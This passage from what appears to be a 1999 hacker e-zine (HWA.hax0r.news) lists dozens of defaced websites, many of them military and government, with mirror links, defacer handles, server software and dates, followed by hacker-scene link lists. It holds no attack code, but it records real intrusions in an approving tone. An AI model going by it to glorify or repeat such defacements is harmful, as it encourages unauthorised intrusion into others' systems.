Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.3.9)
Date 10/31/99

Defaced domain: peoavn.redstone.army.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/peoavn.redstone.army.mil
Defaced by: phreak.nl
Operating System: NT
Date 10/26/99

Defaced domain: www.anti-hacker.org
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.anti-hacker.org
Defaced by: PsychoKid
Operating System: Windows NT

Defaced domain: www.nuggz.com
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.nuggz.com
Defaced by: Thought Criminal
Operating System: Linux
Date 10/26/99

Defaced domain: www.denhaag.nl
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.denhaag.nl
Defaced by: The Millenniumbugz
Operating System: Windows NT
Date 10/26/99

Defaced domain: newnet.jdola.lanl.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/newnet.jdola.lanl.gov
Defaced by: s0ften
Operating System: Windows NT
Date 10/26/99

Defaced domain: www.protesis.com
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.protesis.com
Defaced by: Nemesystm
Operating System: Windows NT
Date 10/26/99

Defaced domain: www.ncsc.navy.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.ncsc.navy.mil
Defaced by: flipz
Operating System: Windows NT
Date 10/26/99

Defaced domain: www.pr.doe.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.pr.doe.gov
Defaced by: flipz
Operating System: Windows NT
Date 10/27/99

Defaced domain: www.hanford.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.hanford.gov
Defaced by: flipz
Operating System: Windows NT
Date 10/27/99

Defaced domain: www.georgemag.com
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.georgemag.com
Defaced by: ULG
Operating System: Windows NT
Date 10/27/99

Defaced domain: www.protesis.com
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.protesis.com
Defaced by: Contr0l C
Operating System: Windows NT
Date 10/27/99

Defaced domain: www.firephotos.com
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.firephotos.com
Defaced by: JxLxMx
Operating System: Windows NT (IIS/4.0)
Date 10/27/99

Defaced domain: www.andersen.af.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.andersen.af.mil
Defaced by: flipz
Operating System: Windows NT (IIS/4.0)
Date 10/27/99

Defaced domain: www.iww.com
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.iww.com
Operating System: Windows NT (WebSitePro/2.3.7)
Date 10/27/99

Defaced domain: www.expresssupplies.com
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.expresssupplies.com
Defaced by: sortof
Operating System: Windows NT (WebSitePro/2.3.7)
Date 10/27/99

Defaced domain: www.madboss.com
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.madboss.com
Defaced by: sortof
Operating System: Windows NT (WebSitePro/2.3.7)
Date 10/27/99

Defaced domain: agent.cccp-duma.kgb.gov.ussr.com.ru
Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/agent.cccp-duma.kgb.gov.ussr.com.ru
Operating System: Solaris (Apache/1.3.3)
Date
10/27/99 Defaced domain: www.hao.org Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.hao.org Defaced by: JxLxMxbr Operating System: BSDI Date 10/27/99 Defaced domain: www.top100.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.top100.com Defaced by: mesmes Operating System: Windows NT (IIS/4 Date 10/27/99 Defaced domain: www.labinco.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.labinco.com Defaced by: DHC Operating System: NT Date 10/27/99 Defaced domain: scotty.navsses.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/scotty.navsses.navy.mil Defaced by: fuqbag Operating System: NT Date 10/27/99 Defaced domain: eagle.chtwl.spear.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/eagle.chtwl.spear.navy.mil Defaced by: fuqrag Operating System: NT Date 10/27/99 Defaced domain: www.csp.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.csp.navy.mil Defaced by: fuqrag Operating System: NT Date 10/27/99 Defaced domain: www.fmcs.gov Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.fmcs.gov Defaced by: fuqbag Operating System: NT Date 10/27/99 Defaced domain: www.amsc.belvoir.army.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.amsc.belvoir.army.mil Defaced by: Pakistan Hackerz Club Operating System: NT Date 10/27/99 Defaced domain: www.buytwinhead.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.buytwinhead.com Defaced by: UBT Operating System: BSD/OS (Apache/1.2.6 FrontPage/3.0.4) Date 10/27/99 Defaced domain: www.hio.ft.hanze.nl Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.hio.ft.hanze.nl Defaced by: Scrippie Operating System: Windows NT (IIS/4.0) Date 10/27/99 Defaced domain: www.dinfos.osd.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.dinfos.osd.mil Defaced by: fuqrag Operating System: Windows NT (IIS/4.0) Date 10/27/99 Defaced domain: www.usitc.gov 
Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.usitc.gov Defaced by: fuqrag Operating System: NT Date 10/27/99 Defaced domain: www.nsg.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.nsg.navy.mil Defaced by: fuqrag Operating System: NT Date 10/28/99 Defaced domain: www.supertec.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.supertec.com Defaced by: h1gh Operating System: NT Date 10/28/99 Defaced domain: www.schoolgirlporn.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.schoolgirlporn.com Defaced by: hacking 4 p0nies Operating System: Solaris Date 10/28/99 Defaced domain: www.dairyqueen.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.dairyqueen.com Defaced by: fuqrag Operating System: NT Date 10/28/99 Defaced domain: www.whitehouseconstruction.co.uk Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.whitehouseconstruction.co.uk Defaced by: vendetta Operating System: Solaris Date 10/28/99 Defaced domain: www.mcbh.usmc.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/27/www.mcbh.usmc.mil Defaced by: fuqrag Operating System: NT Date 10/28/99 Defaced domain: www.peritech.co.uk Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.peritech.co.uk Defaced by: vendetta Operating System: Solaris Date 10/28/99 Defaced domain: brongs.co.kr Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/brongs.co.kr Defaced by: The New World Order Operating System: Linux Date 10/28/99 Defaced domain: fourier.snu.ac.kr Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/fourier.snu.ac.kr Defaced by: The New World Order Operating System: Linux Date 10/29/99 Defaced domain: hotnet.gq.nu Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/hotnet.gq.nu Defaced by: The New World Order Operating System: Linux Date 10/28/99 Defaced domain: www.science.sp-agency.ca Mirror: 
http://www.attrition.org/mirror/attrition/1999/10/28/www.science.sp-agency.ca Defaced by: F.A.D.F.U.C.K. Operating System: NT Date 10/28/99 Defaced domain: www.themilitarycoalition.org Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.themilitarycoalition.org Defaced by: Pakistan Hackerz Club Operating System: NT Date 10/28/99 Defaced domain: www.mcu.usmc.mil (Marine Corps University) Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.mcu.usmc.mil Defaced by: Pakistan Hackerz Club Operating System: NT Date 10/28/99 Defaced domain: www.zoo.co.uk Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.zoo.co.uk Defaced by: vendetta Date 10/28/99 Defaced domain: dominia.elmnet.net Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/dominia.elmnet.net Defaced by: dewm Operating System: Linux Date 10/28/99 Defaced domain: www.chesterfield.nl Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.chesterfield.nl Defaced by: Zelda and Mario Operating System: NT Date 10/28/99 Defaced domain: www.marcostuds.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.marcostuds.com Defaced by: p4riah Operating System: NT Date 10/28/99 Defaced domain: police1.ucr.edu Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/police1.ucr.edu Defaced by: thecraft Operating System: NT Date 10/29/99 Defaced domain: www.nctsfe.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.nctsfe.navy.mil Defaced by: flipz Operating System: NT Defaced domain: www.subasesd.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.subasesd.navy.mil Defaced by: flipz Operating System: NT Date 10/29/99 Defaced domain: www.mms.gov Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.mms.gov Defaced by: fuqraq Operating System: NT Date 10/29/99 Defaced domain: www.weather.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.weather.com Defaced by: hi-tech hate 
Operating System: Solaris Date 10/29/99 Defaced domain: www.covlink.co.uk Mirror: http://www.attrition.org/mirror/attrition/1999/10/28/www.covlink.co.uk Defaced by: narcissus Operating System: NT Date 10/29/99 Defaced domain: apps.opm.gov Mirror: http://www.attrition.org/mirror/attrition/1999/10/29/apps.opm.gov Defaced by: fuqrag Operating System: NT Date 10/29/99 Defaced domain: www.ammar.com.pk Mirror: http://www.attrition.org/mirror/attrition/1999/10/29/www.ammar.com.pk Defaced by: h1gh Operating System: FreeBSD Date 10/29/99 Defaced domain: www.firephotos.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/29/www.firephotos.com Operating System: NT Date 10/29/99 Defaced domain: secure01.clubi.net Mirror: http://www.attrition.org/mirror/attrition/1999/10/29/secure01.clubi.net Defaced by: Blade Operating System: NT Date 10/29/99 Defaced domain: www.adbholdings.com.au Mirror: http://www.attrition.org/mirror/attrition/1999/10/29/www.adbholdings.com.au Defaced by: The Dutch God Date 10/29/99 Defaced domain: www.hao.org Mirror: http://www.attrition.org/mirror/attrition/1999/10/29/www.hao.org Operating System: BSDI Date 10/29/99 Defaced: http://www.ncsc.navy.mil Date: 10/26/99 One line hack: "flipz was here. And nO i am not gay. losers. Well I am sure I am going to get raided now and if i dont the NSA and the DOD are not doing there jobs. hehe. 
paged edited by: flipz " Defaced: http://www.usarc.army.mil (US Army Reserve Command) Date: 10/20/99 Defaced: http://www.wsmr.army.mil (White Sands Missle Range) Date: 10/23/99 Defaced: http://msrconf.microsoft.com/CMT/ (Microsoft's Conference Management Server) Date: 10/24/99 Defaced: http://www.dencom.army.mil (US Army Dental Care System) Date: 10/24/99 Defaced: http://www.massolant.navy.mil (Navy Management System Support Office) Date: 10/24/99 Defaced: http://www.va.gov (Department of Vetrans Affairs) Date: 10/25/99 Defaced domain: www.travelbybenny.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.travelbybenny.com/ Date: 10/25/99 Defaced domain: posilogic.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/posilogic.com/ Date: 10/25/99 Defaced domain: www.unrealwebs.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.unrealwebs.com/ Date: 10/25/99 Defaced domain: www.muddle.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.muddle.com/ Date: 10/25/99 Defaced domain: www.mulberrytech.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.mulberrytech.com/ Date: 10/25/99 Defaced domain: www.muddle.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.muddle.com/ Date: 10/25/99 Defaced domain: www.almo.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.almo.com/ Date: 10/25/99 Defaced domain: www.shields-gazette.co.uk Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.shields-gazette.co.uk/ Defaced by: KES Operating System: Solaris Date: 10/25/99 Defaced domain: www.acm-ul.com Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.acm-ul.com/ Defaced by: p4riah Operating System: Windows_NT Date: 10/25/99 Defaced domain: www.lrce.org Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.lrce.org/ Defaced by: p4riah Operating System: Windows_NT Date: 10/25/99 Defaced domain: www.webdesign.f2s.com Mirror: 
http://www.attrition.org/mirror/attrition/1999/10/25/www.webdesign.f2s.com/ Defaced by: RedAttack Operating System: Linux Date: 10/25/99 Defaced domain: www.samhsa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/10/25/www.samhsa.gov Defaced by: flipz Operating System: Windows NT Date: 10/25/99 Defaced domain: www.adfinder.co.uk Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.adfinder.co.uk Defaced by: Narcissus Operating System: Windows NT (WebSitePro/2.0.37) Date: 10/25/99 Defaced domain: www.ndu.edu Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/www.ndu.edu Defaced by: phreak.nl Operating System: NT Date: 10/25/99 Defaced domain: acquisition.jpl.nasa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/acquisition.jpl.nasa.gov Defaced by: phreak.nl Operating System: NT Date: 10/25/99 Defaced domain: peoavn.redstone.army.mil Mirror: http://www.attrition.org/mirror/attrition/1999/10/26/peoavn.redstone.army.mil Defaced by: phreak.nl Operating System: NT and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. 
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/

International links: (TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondents and others, please send in links to news sites that carry security news from foreign countries for inclusion in this list. Thanks... - Ed

Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Colombia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Finland ......: http://hackunlimited.com/
Germany ......: http://www.alldas.de/
                http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa .: http://www.hackers.co.za
                http://www.hack.co.za
                http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
.za (South Africa) sites contributed by wyzwun, tnx guy...

Got a link for this section? Email it to hwa@press.usmc.net and I'll review it and post it here if it merits it.

[ASCII art banner: "I Hate Stupid People"]

@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]